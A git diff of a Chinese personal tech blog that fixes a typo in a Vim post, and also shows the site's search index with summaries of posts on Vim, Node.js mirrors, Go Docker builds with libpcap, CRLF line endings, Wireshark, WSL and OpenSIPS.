diff --git a/categories/all/index.html b/categories/all/index.html index 16f0f7efa..2973a8d05 100644 --- a/categories/all/index.html +++ b/categories/all/index.html @@ -3,7 +3,7 @@ 因为错误提示只有一行,所以无法上下移动。 一直以来,我并没有把错误提示框也看成一个窗口,所以我可能多次按了ctrl + w w, 然后光标跳转到了错误提示框上。 正常的错误提示框,当光标不在关键词上时,错误弹窗会自动关闭的。 但是由于我已经进入了错误弹窗里面。 所以除非按窗口切换的快捷键,我会始终困在这个错误窗口中。 -我觉得,VIM实在是太博大精深了。很多感念性的理解不到位,就会越到很多困难。 这些困难会给人造成极大的挫折感。 +我觉得,VIM实在是太博大精深了。很多概念性的理解不到位,就会越到很多困难。 这些困难会给人造成极大的挫折感。 能解决困难,则学到东西。 否则就只能放弃VIM, 回到VScode的怀抱中。 但是,我已经习惯了不使用鼠标的快捷编辑方式。 diff --git a/categories/all/index.xml b/categories/all/index.xml index caf7c0ceb..8b3cb1da8 100644 --- a/categories/all/index.xml +++ b/categories/all/index.xml @@ -21,7 +21,7 @@ 因为错误提示只有一行,所以无法上下移动。 一直以来,我并没有把错误提示框也看成一个窗口,所以我可能多次按了ctrl + w w, 然后光标跳转到了错误提示框上。 正常的错误提示框,当光标不在关键词上时,错误弹窗会自动关闭的。 但是由于我已经进入了错误弹窗里面。 所以除非按窗口切换的快捷键,我会始终困在这个错误窗口中。 -我觉得,VIM实在是太博大精深了。很多感念性的理解不到位,就会越到很多困难。 这些困难会给人造成极大的挫折感。 +我觉得,VIM实在是太博大精深了。很多概念性的理解不到位,就会越到很多困难。 这些困难会给人造成极大的挫折感。 能解决困难,则学到东西。 否则就只能放弃VIM, 回到VScode的怀抱中。 但是,我已经习惯了不使用鼠标的快捷编辑方式。 diff --git a/index.html b/index.html index d078aa27d..837cd33e5 100644 --- a/index.html +++ b/index.html @@ -3,7 +3,7 @@ 因为错误提示只有一行,所以无法上下移动。 一直以来,我并没有把错误提示框也看成一个窗口,所以我可能多次按了ctrl + w w, 然后光标跳转到了错误提示框上。 正常的错误提示框,当光标不在关键词上时,错误弹窗会自动关闭的。 但是由于我已经进入了错误弹窗里面。 所以除非按窗口切换的快捷键,我会始终困在这个错误窗口中。 -我觉得,VIM实在是太博大精深了。很多感念性的理解不到位,就会越到很多困难。 这些困难会给人造成极大的挫折感。 +我觉得,VIM实在是太博大精深了。很多概念性的理解不到位,就会越到很多困难。 这些困难会给人造成极大的挫折感。 能解决困难,则学到东西。 否则就只能放弃VIM, 回到VScode的怀抱中。 但是,我已经习惯了不使用鼠标的快捷编辑方式。 diff --git a/index.json b/index.json index dd0843ea3..a0dfe4642 100644 --- a/index.json +++ b/index.json @@ -1 +1 @@ -[{"content":"请注意,VIM的光标现在位于错误弹窗上了。光标只能左右移动,无法上线移动。 我的光标被困在了错误提示框中。\n因为错误提示只有一行,所以无法上下移动。\n一直以来,我并没有把错误提示框也看成一个窗口,所以我可能多次按了ctrl + w w, 然后光标跳转到了错误提示框上。\n正常的错误提示框,当光标不在关键词上时,错误弹窗会自动关闭的。 但是由于我已经进入了错误弹窗里面。 所以除非按窗口切换的快捷键,我会始终困在这个错误窗口中。\n我觉得,VIM实在是太博大精深了。很多感念性的理解不到位,就会越到很多困难。 这些困难会给人造成极大的挫折感。\n能解决困难,则学到东西。\n否则就只能放弃VIM, 回到VScode的怀抱中。\n但是,我已经习惯了不使用鼠标的快捷编辑方式。\n我只能学会解决并适应VIM, 并且接受VIM的所有挑战。\n","permalink":"https://wdd.js.org/vim/stuck-in-error-msgfloat-window/","summary":"请注意,VIM的光标现在位于错误弹窗上了。光标只能左右移动,无法上线移动。 我的光标被困在了错误提示框中。\n因为错误提示只有一行,所以无法上下移动。\n一直以来,我并没有把错误提示框也看成一个窗口,所以我可能多次按了ctrl + w w, 然后光标跳转到了错误提示框上。\n正常的错误提示框,当光标不在关键词上时,错误弹窗会自动关闭的。 但是由于我已经进入了错误弹窗里面。 所以除非按窗口切换的快捷键,我会始终困在这个错误窗口中。\n我觉得,VIM实在是太博大精深了。很多感念性的理解不到位,就会越到很多困难。 这些困难会给人造成极大的挫折感。\n能解决困难,则学到东西。\n否则就只能放弃VIM, 回到VScode的怀抱中。\n但是,我已经习惯了不使用鼠标的快捷编辑方式。\n我只能学会解决并适应VIM, 并且接受VIM的所有挑战。","title":"困在coc错误弹窗中"},{"content":"在VScode中,可以使用右键来跳转到typescript类型对应的定义,但是用vim的gd命令却无法正常跳转。\n因为无法正常跳转的这个问题,我差点放弃了vim。\n然而我想别人应该也遇到类似的问题。\n我的neovim本身使用的是coc插件,然后我就再次到看看官方文档,来确定最终有没有解决这个问题的方案。\n功夫不负有心人。\n我发现官方给的例子中,就包括了如何配置跳换的配置。\n首先说明一下,我本身就安装了coc-json coc-tsserver这两个插件,所以只需要将如下的配置写入init.vim\n\u0026#34; GoTo code navigation nmap \u0026lt;silent\u0026gt; gd \u0026lt;Plug\u0026gt;(coc-definition) nmap \u0026lt;silent\u0026gt; gy \u0026lt;Plug\u0026gt;(coc-type-definition) nmap \u0026lt;silent\u0026gt; gi \u0026lt;Plug\u0026gt;(coc-implementation) nmap \u0026lt;silent\u0026gt; gr \u0026lt;Plug\u0026gt;(coc-references) 这样的话,在普通模式,按gy这个快捷键,就能跳转到对应的类型定义,包括某个npm包的里面的类型定义,非常好用。\n亲测有效。\n","permalink":"https://wdd.js.org/vim/typescript-go-to-definition/","summary":"在VScode中,可以使用右键来跳转到typescript类型对应的定义,但是用vim的gd命令却无法正常跳转。\n因为无法正常跳转的这个问题,我差点放弃了vim。\n然而我想别人应该也遇到类似的问题。\n我的neovim本身使用的是coc插件,然后我就再次到看看官方文档,来确定最终有没有解决这个问题的方案。\n功夫不负有心人。\n我发现官方给的例子中,就包括了如何配置跳换的配置。\n首先说明一下,我本身就安装了coc-json coc-tsserver这两个插件,所以只需要将如下的配置写入init.vim\n\u0026#34; GoTo code navigation nmap \u0026lt;silent\u0026gt; gd \u0026lt;Plug\u0026gt;(coc-definition) nmap \u0026lt;silent\u0026gt; gy \u0026lt;Plug\u0026gt;(coc-type-definition) nmap \u0026lt;silent\u0026gt; gi \u0026lt;Plug\u0026gt;(coc-implementation) nmap \u0026lt;silent\u0026gt; gr \u0026lt;Plug\u0026gt;(coc-references) 这样的话,在普通模式,按gy这个快捷键,就能跳转到对应的类型定义,包括某个npm包的里面的类型定义,非常好用。\n亲测有效。","title":"VIM typescript 跳转到定义"},{"content":"我一般会紧跟着NodeJS官网的最新版,来更新本地的NodeJS版本。\n我的系统是ubuntu 20.4, 我用tj/n这个工具来更新Node。\n但是这一次,这个命令似乎卡住了。\n我排查后发现,是n这个命令在访问https://nodejs.org/dist/index.tab这个地址时,卡住了。\n请求超时,因为默认没有设置超时时长,所以等待了很久才显示超时的报错,表现象上看起来就是卡住了。\n首先我用dig命令查了nodejs.org的dns解析,我发现是正常解析的。\n然后我又用curl对nodejs官网做了一个测试,发现也是请求超时。\ncurl -i -m 5 https://nodejs.org curl: (28) Failed to connect to nodejs.org port 443 after 3854 ms: 连接超时 这样问题就清楚了,然后我就想起来npmirrror上应该有nodejs的镜像。 在查看n这个工具的文档时,我也发现,它是支持设置mirror的。\n其中给的例子用的就是淘宝NPM\n就是设置了一个环境变量。然后执行source ~/.zshrc\nexport N_NODE_MIRROR=https://npmmirror.com/mirrors/node 但是,我发现在命令行里用echo可以打印N_NODE_MIRROR这个变量的值,但是在安装脚本里,还是无法获取设置的这个mirror。\n我想或许和我在执行sudo n lts时的sudo有关,这个.zshrc在sudo这种管理员模式下是不生效的。普通用户的环境变量也不会继承到sudo执行的环境变量里\n最后,我用sudo -E n lts, 成功的从npmmirror上更新了nodejs的版本。\n关于curl超时的这个问题,我也给n仓库提出了pull request, https://github.com/tj/n/pull/771\n","permalink":"https://wdd.js.org/posts/2023/n-stucked/","summary":"我一般会紧跟着NodeJS官网的最新版,来更新本地的NodeJS版本。\n我的系统是ubuntu 20.4, 我用tj/n这个工具来更新Node。\n但是这一次,这个命令似乎卡住了。\n我排查后发现,是n这个命令在访问https://nodejs.org/dist/index.tab这个地址时,卡住了。\n请求超时,因为默认没有设置超时时长,所以等待了很久才显示超时的报错,表现象上看起来就是卡住了。\n首先我用dig命令查了nodejs.org的dns解析,我发现是正常解析的。\n然后我又用curl对nodejs官网做了一个测试,发现也是请求超时。\ncurl -i -m 5 https://nodejs.org curl: (28) Failed to connect to nodejs.org port 443 after 3854 ms: 连接超时 这样问题就清楚了,然后我就想起来npmirrror上应该有nodejs的镜像。 在查看n这个工具的文档时,我也发现,它是支持设置mirror的。\n其中给的例子用的就是淘宝NPM\n就是设置了一个环境变量。然后执行source ~/.zshrc\nexport N_NODE_MIRROR=https://npmmirror.com/mirrors/node 但是,我发现在命令行里用echo可以打印N_NODE_MIRROR这个变量的值,但是在安装脚本里,还是无法获取设置的这个mirror。\n我想或许和我在执行sudo n lts时的sudo有关,这个.zshrc在sudo这种管理员模式下是不生效的。普通用户的环境变量也不会继承到sudo执行的环境变量里\n最后,我用sudo -E n lts, 成功的从npmmirror上更新了nodejs的版本。\n关于curl超时的这个问题,我也给n仓库提出了pull request, https://github.com/tj/n/pull/771","title":"安装NodeJS, N命令似乎卡住了"},{"content":"很早以前,要运行js,则必须安装nodejs,且没什么办法可以把js直接构建成一个可执行的文件。\n后来出现一个pkg的npm包,可以用来将js打包成可执行的文件。\n我好像用过这个包,但是似乎中间出过一些问题。\n现在是2023年,前端有了新的气象。\n除了nodejs外,还有其他的后来新秀,如deno, 还有最近表火的bun\n另外nodejs本身也开始支持打包独立二进制文件了,但是需要最新的20.x版本,而且我看了它的使用介绍文档,single-executable-applications, 看起来是有有点复杂,光一个构建就写了七八步。\n所以今天只比较一些deno和bun的构建出的文件大小。\n准备的js文件内容\n// app.js console.log(\u0026#34;hello world\u0026#34;) deno构建指令: deno compile --output h1 app.js, 构建产物为h1 bun构建指令: bun build ./app.js --compile --outfile h2, 构建产物为h2\n-rw-r--r--@ 1 wangduanduan staff 26B Jun 1 13:34 app.js -rwxrwxrwx@ 1 wangduanduan staff 78M Jun 1 13:59 h1 -rwxrwxrwx@ 1 wangduanduan staff 45M Jun 1 14:01 h2 源代码为26b字节\ndeno构建相比于源码的倍数: 3152838 bun构建相比于源码的翻倍: 1804415 deno构建的可执行文件相比bun翻倍:1.7 参考 https://bun.sh/docs/bundler/executables https://deno.com/manual@v1.34.1/tools/compiler https://nodejs.org/api/single-executable-applications.html ","permalink":"https://wdd.js.org/posts/2023/js-runtime-build-executable/","summary":"很早以前,要运行js,则必须安装nodejs,且没什么办法可以把js直接构建成一个可执行的文件。\n后来出现一个pkg的npm包,可以用来将js打包成可执行的文件。\n我好像用过这个包,但是似乎中间出过一些问题。\n现在是2023年,前端有了新的气象。\n除了nodejs外,还有其他的后来新秀,如deno, 还有最近表火的bun\n另外nodejs本身也开始支持打包独立二进制文件了,但是需要最新的20.x版本,而且我看了它的使用介绍文档,single-executable-applications, 看起来是有有点复杂,光一个构建就写了七八步。\n所以今天只比较一些deno和bun的构建出的文件大小。\n准备的js文件内容\n// app.js console.log(\u0026#34;hello world\u0026#34;) deno构建指令: deno compile --output h1 app.js, 构建产物为h1 bun构建指令: bun build ./app.js --compile --outfile h2, 构建产物为h2\n-rw-r--r--@ 1 wangduanduan staff 26B Jun 1 13:34 app.js -rwxrwxrwx@ 1 wangduanduan staff 78M Jun 1 13:59 h1 -rwxrwxrwx@ 1 wangduanduan staff 45M Jun 1 14:01 h2 源代码为26b字节\ndeno构建相比于源码的倍数: 3152838 bun构建相比于源码的翻倍: 1804415 deno构建的可执行文件相比bun翻倍:1.7 参考 https://bun.sh/docs/bundler/executables https://deno.com/manual@v1.34.1/tools/compiler https://nodejs.org/api/single-executable-applications.html ","title":"JS运行时构建独立二进制程序比较"},{"content":"常规构建 一般情况下,我们的Dockerfile可能是下面这样的\n这个Dockerfile使用了多步构建,使用golang:1.19.4作为构建容器,二进制文件构建成功后,单独把文件复制到alpine镜像。 这样做的好处是最后产出的镜像非常小,一般只有十几MB的样子,如果直接使用golang的镜像来构建,镜像体积就可能达到1G左右。 FROM golang:1.19.4 as builder ENV GO111MODULE=on GOPROXY=https://goproxy.cn,direct WORKDIR /app COPY . . RUN CGO_ENABLED=0 GOOS=linux GOARCH=amd64 go build -o run . FROM alpine:3.14.2 WORKDIR /app COPY encdec run.sh /app/ COPY --from=builder /app/run . EXPOSE 3000 ENTRYPOINT [\u0026#34;/app/run\u0026#34;] 依赖libpcap的构建 如果使用了程序使用了libpcap 来抓包,那么除了我们自己代码产生的二进制文件外,可能还会依赖libpcap的文件。常规打包就会报各种错误,例如文件找不到,缺少so文件等等。\nlibpcap是一个c库,并不是golang的代码,所以处理起来要不一样。\n下面直接给出Dockerfile\n# 构建的基础镜像换成了alpine镜像 FROM golang:alpine as builder # 将alpine镜像换清华源,这样后续依赖的安装会加快 RUN sed -i \u0026#39;s/dl-cdn.alpinelinux.org/mirrors.tuna.tsinghua.edu.cn/g\u0026#39; /etc/apk/repositories # 安装需要用到的C库,和构建依赖 RUN apk --update add linux-headers musl-dev gcc libpcap-dev # 使用国内的goproxy ENV GO111MODULE=on GOPROXY=https://goproxy.cn,direct # 设置工作目录 WORKDIR /app # 拷贝go相关的依赖 COPY go.mod go.sum ./ # 下载go相关的依赖 RUN go mod download # 复制go代码 COPY . . # 编译go代码 RUN CGO_ENABLED=1 GOOS=linux GOARCH=amd64 go build -a --ldflags \u0026#39;-linkmode external -extldflags \u0026#34;-static -s -w\u0026#34;\u0026#39; -o run main.go # 使用最小的scratch镜像 FROM scratch # 设置工作目录 WORKDIR /app # 拷贝二进制文件 COPY --from=builder /app/run . EXPOSE 8086 ENTRYPOINT [\u0026#34;/app/run\u0026#34;] 整个Dockerfile比较好理解,重要的部分就是ldflags的参数了,下面着重讲解一下\n--ldflags \u0026#39;-linkmode external -extldflags \u0026#34;-static -s -w\u0026#34;\u0026#39; 这个 go build 命令包含以下参数:\n-a:强制重新编译所有的包,即使它们已经是最新的。这个选项通常用于强制更新依赖包或者重建整个程序。 --ldflags:设置链接器选项,这个选项后面的参数会被传递给链接器。 -linkmode external:指定链接模式为 external,即使用外部链接器。 -extldflags \u0026quot;-static -s -w\u0026quot;:传递给外部链接器的选项,其中包含了 -static(强制使用静态链接)、-s(禁止符号表和调试信息生成)和 -w(禁止 DWARF 调试信息生成)三个选项。 这个命令的目的是生成一个静态链接的可执行文件,其中所有的依赖包都被链接进了最终的二进制文件中,这样可以保证可执行文件的可移植性和兼容性,同时也可以减小文件大小。这个命令的缺点是编译时间较长,特别是在包数量较多的情况下,因为它需要重新编译所有的包,即使它们已经是最新的。\n","permalink":"https://wdd.js.org/golang/build-docker-image-with-libpcap/","summary":"常规构建 一般情况下,我们的Dockerfile可能是下面这样的\n这个Dockerfile使用了多步构建,使用golang:1.19.4作为构建容器,二进制文件构建成功后,单独把文件复制到alpine镜像。 这样做的好处是最后产出的镜像非常小,一般只有十几MB的样子,如果直接使用golang的镜像来构建,镜像体积就可能达到1G左右。 FROM golang:1.19.4 as builder ENV GO111MODULE=on GOPROXY=https://goproxy.cn,direct WORKDIR /app COPY . . RUN CGO_ENABLED=0 GOOS=linux GOARCH=amd64 go build -o run . FROM alpine:3.14.2 WORKDIR /app COPY encdec run.sh /app/ COPY --from=builder /app/run . EXPOSE 3000 ENTRYPOINT [\u0026#34;/app/run\u0026#34;] 依赖libpcap的构建 如果使用了程序使用了libpcap 来抓包,那么除了我们自己代码产生的二进制文件外,可能还会依赖libpcap的文件。常规打包就会报各种错误,例如文件找不到,缺少so文件等等。\nlibpcap是一个c库,并不是golang的代码,所以处理起来要不一样。\n下面直接给出Dockerfile\n# 构建的基础镜像换成了alpine镜像 FROM golang:alpine as builder # 将alpine镜像换清华源,这样后续依赖的安装会加快 RUN sed -i \u0026#39;s/dl-cdn.alpinelinux.org/mirrors.tuna.tsinghua.edu.cn/g\u0026#39; /etc/apk/repositories # 安装需要用到的C库,和构建依赖 RUN apk --update add linux-headers musl-dev gcc libpcap-dev # 使用国内的goproxy ENV GO111MODULE=on GOPROXY=https://goproxy.","title":"Build Docker Image With Libpcap"},{"content":"默认情况下VScode的tab栏,当前的颜色会更深一点。如下图所示,第三个就是激活的。\n但是实际上并没有太高的区分度,特别是当显示屏有点反光的时候。\n我想应该不止一个人有这个问题吧\n看了github上,有个人反馈了这个问题,https://github.com/Microsoft/vscode/issues/24586\n后面有人回复了\n\u0026#34;workbench.colorCustomizations\u0026#34;: { \u0026#34;tab.activeBorder\u0026#34;: \u0026#34;#ff0000\u0026#34;, \u0026#34;tab.unfocusedActiveBorder\u0026#34;: \u0026#34;#000000\u0026#34; } 上面就是用来配置Tab边界的颜色的。\n看下效果,当前激活的Tab下有明显的红线,是不是更容易区分了呢\n","permalink":"https://wdd.js.org/posts/2023/vscode-highlight-tab/","summary":"默认情况下VScode的tab栏,当前的颜色会更深一点。如下图所示,第三个就是激活的。\n但是实际上并没有太高的区分度,特别是当显示屏有点反光的时候。\n我想应该不止一个人有这个问题吧\n看了github上,有个人反馈了这个问题,https://github.com/Microsoft/vscode/issues/24586\n后面有人回复了\n\u0026#34;workbench.colorCustomizations\u0026#34;: { \u0026#34;tab.activeBorder\u0026#34;: \u0026#34;#ff0000\u0026#34;, \u0026#34;tab.unfocusedActiveBorder\u0026#34;: \u0026#34;#000000\u0026#34; } 上面就是用来配置Tab边界的颜色的。\n看下效果,当前激活的Tab下有明显的红线,是不是更容易区分了呢","title":"VScode激活Tab更容易区分"},{"content":"CRLF 二进制 十进制 十六进制 八进制 字符/缩写 解释 00001010 10 0A 012 LF/NL(Line Feed/New Line) 换行键 00001101 13 0D 085 CR (Carriage Return) 回车键 CR代表回车符,LF代表换行符。\n这两个符号本身都是不可见的。\n如果打印出来\nCR 会显示 \\r LF 会显示 \\n 不同系统的行结束符 Linux系统和Mac换行符是 \\n Windows系统的换行符是 \\r\\n 如何区分文件的换行符? 可以使用od命令\nod -bc index.md 假如文件的原始内容如下\n- 1 - 2 注意012是八进制的数,十进制对应的数字是10,也就是换行符。\n0000000 055 040 061 012 055 040 062 - 1 \\n - 2 0000007 如果用vscode打开文件,也能看到对应的文件格式,如LF。\n换行符的的差异会导致哪些问题? shell脚本问题 如果bash脚本里包含CRLF, 可能导致脚本无法解析等各种异常问题。\n例如下面的报错,docker启动shell脚本可能是在windows下编写的。所以脚本无法\nstandard_init_linux.go:211: exec user process caused \u0026#34;no such file or directory\u0026#34; 如何把windows文件类型转为unix? # 可以把windows文件类型转为unix dos2unix file 如果是vscode,也可以点击对应的文件格式按钮。\n如何解决这些问题? 最好的方案,是我们把代码编辑器, 设置eol为\\n, 从源头解决这个问题。\n以vscode为例子:\nTip vscode的eol配置,只对新文件生效 如果文件本来就是CRLF, 需要先转成LF, eol才会生效 ","permalink":"https://wdd.js.org/posts/2023/tips-about-cr-lf/","summary":"CRLF 二进制 十进制 十六进制 八进制 字符/缩写 解释 00001010 10 0A 012 LF/NL(Line Feed/New Line) 换行键 00001101 13 0D 085 CR (Carriage Return) 回车键 CR代表回车符,LF代表换行符。\n这两个符号本身都是不可见的。\n如果打印出来\nCR 会显示 \\r LF 会显示 \\n 不同系统的行结束符 Linux系统和Mac换行符是 \\n Windows系统的换行符是 \\r\\n 如何区分文件的换行符? 可以使用od命令\nod -bc index.md 假如文件的原始内容如下\n- 1 - 2 注意012是八进制的数,十进制对应的数字是10,也就是换行符。\n0000000 055 040 061 012 055 040 062 - 1 \\n - 2 0000007 如果用vscode打开文件,也能看到对应的文件格式,如LF。\n换行符的的差异会导致哪些问题? shell脚本问题 如果bash脚本里包含CRLF, 可能导致脚本无法解析等各种异常问题。\n例如下面的报错,docker启动shell脚本可能是在windows下编写的。所以脚本无法\nstandard_init_linux.go:211: exec user process caused \u0026#34;no such file or directory\u0026#34; 如何把windows文件类型转为unix?","title":"行位结束符引起的问题"},{"content":"硬件 内存:金士顿 16*2;869元 固态硬盘: 三星980 1TB; 799元 主机:NUC11 PAHI7; 4核心八线程;3399元 累计5000多一点, 是最新版Macbook pro M1prod的三分之一\n启动盘制作 ventoy:试了几次,无法开机,遂放弃 rufus:能够正常使用;注意分区类型要选择GPT。最新款的一些电脑都是支持uefi的,所以选择GPT分区,一定没问题。\nU盘启动 开机后按F2, 里面有一个是设置BIOS优先级,可以设置优先U盘启动\n磁盘分区 因为之前设置了默认的整个磁盘分区,根目录只有15G, 太小了,所以我选择手动分区 先设置一个efi分区,就用默认的300M就可以,默认弹窗出来,是不需要设置挂在目录的 设置根分区 /, 我分了300G 设置/home分区,剩下的磁盘都分给他 我没有设置swap分区,因为我觉得32G内存够大,不需要swap\n其他 后续的配置非常简单,基本点点按钮就能搞定\n体验 总体来说,安装软件是最舒服的一件事。不需要像安装manjaro那样,到处找安装常用应用的教程。只需要打开应用商店,点击下载就可以了。 整个安装过程,我觉得磁盘分区是最难的部分。其他都是非常方便的。 感觉深度的界面很漂亮,值得体验\n问题 NUC自带的麦克风无法外放声音,插有线耳机也不行,只有蓝牙耳机能用 ","permalink":"https://wdd.js.org/posts/2022/12/nuc11-deepin-20-2/","summary":"硬件 内存:金士顿 16*2;869元 固态硬盘: 三星980 1TB; 799元 主机:NUC11 PAHI7; 4核心八线程;3399元 累计5000多一点, 是最新版Macbook pro M1prod的三分之一\n启动盘制作 ventoy:试了几次,无法开机,遂放弃 rufus:能够正常使用;注意分区类型要选择GPT。最新款的一些电脑都是支持uefi的,所以选择GPT分区,一定没问题。\nU盘启动 开机后按F2, 里面有一个是设置BIOS优先级,可以设置优先U盘启动\n磁盘分区 因为之前设置了默认的整个磁盘分区,根目录只有15G, 太小了,所以我选择手动分区 先设置一个efi分区,就用默认的300M就可以,默认弹窗出来,是不需要设置挂在目录的 设置根分区 /, 我分了300G 设置/home分区,剩下的磁盘都分给他 我没有设置swap分区,因为我觉得32G内存够大,不需要swap\n其他 后续的配置非常简单,基本点点按钮就能搞定\n体验 总体来说,安装软件是最舒服的一件事。不需要像安装manjaro那样,到处找安装常用应用的教程。只需要打开应用商店,点击下载就可以了。 整个安装过程,我觉得磁盘分区是最难的部分。其他都是非常方便的。 感觉深度的界面很漂亮,值得体验\n问题 NUC自带的麦克风无法外放声音,插有线耳机也不行,只有蓝牙耳机能用 ","title":"NUC11 安装 Deepin 20.2.4"},{"content":"0. 前提条件 wireshark 4.0.2 1. 时间显示 wireshark的默认时间显示是抓包的相对时间, 如果我们时间按照年月日时分秒显示,就需要进行如下设置:\n视图-\u0026gt;时间显示格式-\u0026gt;选择具体的时间格式\n2. UDP解码为RTP 方案1 在一个包UDP包上点击右键,出现如下弹框,选择Decode As\n再当前值上选择RTP 方案2 方案1有一个缺点,只能过滤单一端口的UDP包,将其解码为RTP。\n假如有很多的UDP包,并且端口都不一样,如果想把这些包都解码为RTP, 则需要如下设置。\n选择分析-\u0026gt;启用的协议\n在搜索框中输入RTP, 然后启用RTP的rtp_udp\n","permalink":"https://wdd.js.org/posts/2022/12/wireshark-101/","summary":"0. 前提条件 wireshark 4.0.2 1. 时间显示 wireshark的默认时间显示是抓包的相对时间, 如果我们时间按照年月日时分秒显示,就需要进行如下设置:\n视图-\u0026gt;时间显示格式-\u0026gt;选择具体的时间格式\n2. UDP解码为RTP 方案1 在一个包UDP包上点击右键,出现如下弹框,选择Decode As\n再当前值上选择RTP 方案2 方案1有一个缺点,只能过滤单一端口的UDP包,将其解码为RTP。\n假如有很多的UDP包,并且端口都不一样,如果想把这些包都解码为RTP, 则需要如下设置。\n选择分析-\u0026gt;启用的协议\n在搜索框中输入RTP, 然后启用RTP的rtp_udp","title":"Wireshark 使用技巧"},{"content":"最近我更新了Windows, 之后我的Windows Linux子系统Ubuntu打开就报错了\n报错截图如下:\n在网上搜了一边之后,很多教程都是说要打开Windows的子系统的功能。 但是由于我已经使用Linux子系统已经很长时间了,我觉得应该和这个设置无关。\n而且我检查了一下,我的这个设置本来就是打开的。\n然后我在Powershell里输入 wsl, 这个命令都直接报错了。\nPS C:\\WINDOWS\\system32\u0026gt; wsl --install 没有注册类 Error code: Wsl/0x80040154 然后我到wsl的github上搜索类似的问题,查到有很多类似的描述,都是升级之后遇到的问题,我试了好几个方式,都没用。\n但是最后这个有用了!\nhttps://github.com/microsoft/WSL/issues/9064\n解决的方案就是:\n卸载已经安装过的Windows SubSystem For Linux Preview 然后再Windows应用商店重新安装这个应用 Windows的升级之后,可能Windows Linux子系统组建也更新了某些了内容。\n所以需要重装。\n这里不得不吐槽一下WSL, 这个工具仅仅是个玩具。随着windows更新,这个工具随时都会崩溃,最好不要太依赖它。\n","permalink":"https://wdd.js.org/posts/2022/12/wsl-error-0x80040154-after-windows-update/","summary":"最近我更新了Windows, 之后我的Windows Linux子系统Ubuntu打开就报错了\n报错截图如下:\n在网上搜了一边之后,很多教程都是说要打开Windows的子系统的功能。 但是由于我已经使用Linux子系统已经很长时间了,我觉得应该和这个设置无关。\n而且我检查了一下,我的这个设置本来就是打开的。\n然后我在Powershell里输入 wsl, 这个命令都直接报错了。\nPS C:\\WINDOWS\\system32\u0026gt; wsl --install 没有注册类 Error code: Wsl/0x80040154 然后我到wsl的github上搜索类似的问题,查到有很多类似的描述,都是升级之后遇到的问题,我试了好几个方式,都没用。\n但是最后这个有用了!\nhttps://github.com/microsoft/WSL/issues/9064\n解决的方案就是:\n卸载已经安装过的Windows SubSystem For Linux Preview 然后再Windows应用商店重新安装这个应用 Windows的升级之后,可能Windows Linux子系统组建也更新了某些了内容。\n所以需要重装。\n这里不得不吐槽一下WSL, 这个工具仅仅是个玩具。随着windows更新,这个工具随时都会崩溃,最好不要太依赖它。","title":"Windows更新之后 Linux报错 Error 0x80040154"},{"content":"在设置里搜索双击,如果有使用双击关闭浏览器选项卡, 则开启。\n对于用鼠标关闭标签页来说,的确可以提高极大的效率。\n","permalink":"https://wdd.js.org/posts/2022/12/double-click-close-tab/","summary":"在设置里搜索双击,如果有使用双击关闭浏览器选项卡, 则开启。\n对于用鼠标关闭标签页来说,的确可以提高极大的效率。","title":"Edge浏览器双击标签栏 关闭标签页"},{"content":"我在2019年的六月份时候,开始使用语雀。\n一路走来,我见证了语雀的功能越来越多,但是于此同时,我也越来越讨厌语雀。\n2022年12月初,我基本上把语雀上的所有内容都迁移到我的hugo博客上。\n我的博客很乱,也很多。我写了一个脚本,一个一个知识库的搬迁,总体速度还算快,唯一不便的就是图片需要一个一个复制粘贴。\n有些图片是用语雀的绘图语言例如plantuml编写的,就只能截图保存了。\n总之,我也是蛮累的。\n简单列一下我不喜欢语雀的几个原因:\n性能差,首页渲染慢,常常要等很久,首页才能打开 产品定位混乱,随意更改用户数据 我记得有时候我把知识库升级成了空间,过了一段时间,不知道为什么空间由变成了知识库。 数字花园这个概念真的很烂。我好好的个人主页,某一天打开,大变样,换了个名字,叫做数字花园。甚至没有给用户一个选择保留老版本的个人主页的权利。太不尊重用户了!! 就好像你下班回家,看见房门被人撬开,你打开房门,看见有人在你的客厅种满大蒜,然后还兴高采烈的告诉你,看,这是您的数字菜园!多好,以后不用买蒜了。 会员的流量计费规则, 或许现在的计费规则已经变了,我也没有再充会员,但是再以前。即使是会员,也是按流量计费的。什么叫按流量计费,假如你的一篇博客里上传了一张1mb的图片,即使你后来把这个图片删了,这1mb的流量还是会存在。而且流量是一直往上涨的,还不像运营商,每月一号给你清零一次的机会。 ","permalink":"https://wdd.js.org/posts/2022/12/why-i-dont-not-use-yuque-any-more/","summary":"我在2019年的六月份时候,开始使用语雀。\n一路走来,我见证了语雀的功能越来越多,但是于此同时,我也越来越讨厌语雀。\n2022年12月初,我基本上把语雀上的所有内容都迁移到我的hugo博客上。\n我的博客很乱,也很多。我写了一个脚本,一个一个知识库的搬迁,总体速度还算快,唯一不便的就是图片需要一个一个复制粘贴。\n有些图片是用语雀的绘图语言例如plantuml编写的,就只能截图保存了。\n总之,我也是蛮累的。\n简单列一下我不喜欢语雀的几个原因:\n性能差,首页渲染慢,常常要等很久,首页才能打开 产品定位混乱,随意更改用户数据 我记得有时候我把知识库升级成了空间,过了一段时间,不知道为什么空间由变成了知识库。 数字花园这个概念真的很烂。我好好的个人主页,某一天打开,大变样,换了个名字,叫做数字花园。甚至没有给用户一个选择保留老版本的个人主页的权利。太不尊重用户了!! 就好像你下班回家,看见房门被人撬开,你打开房门,看见有人在你的客厅种满大蒜,然后还兴高采烈的告诉你,看,这是您的数字菜园!多好,以后不用买蒜了。 会员的流量计费规则, 或许现在的计费规则已经变了,我也没有再充会员,但是再以前。即使是会员,也是按流量计费的。什么叫按流量计费,假如你的一篇博客里上传了一张1mb的图片,即使你后来把这个图片删了,这1mb的流量还是会存在。而且流量是一直往上涨的,还不像运营商,每月一号给你清零一次的机会。 ","title":"为什么我不再使用语雀"},{"content":"写过opensips脚本的同学,往往对函数的传参感到困惑。\n例如:\nds_select_dst()可以接受整数或者值为正数的变量作为第一个参数,但是nat_uac_test()的第一个参数就只能是整数,而不能是变量 为什么rl_check()可以接受格式化的字符串,而save()只能接受字符串。 为什么ds_select_dst(\u0026quot;1\u0026quot;, \u0026quot;4\u0026quot;) 作为整数也要加上双引号? 为什么变量要加上双引号? ds_select_dst(\u0026quot;$var(aa)\u0026quot;, \u0026quot;4\u0026quot;) 为什么t_on_branch(\u0026quot;1\u0026quot;)路由的钩子要加上双引号? 为什么route(go_to_something);这里又不需要加上引号? ds_select_dst(\u0026#34;1\u0026#34;, \u0026#34;0\u0026#34;); $var(aa)=1; ds_select_dst(\u0026#34;$var(aa)\u0026#34;, \u0026#34;0\u0026#34;); rl_check(\u0026#34;gw_$ru\u0026#34;, \u0026#34;$var(limit)\u0026#34;); #格式化的gw_$ru 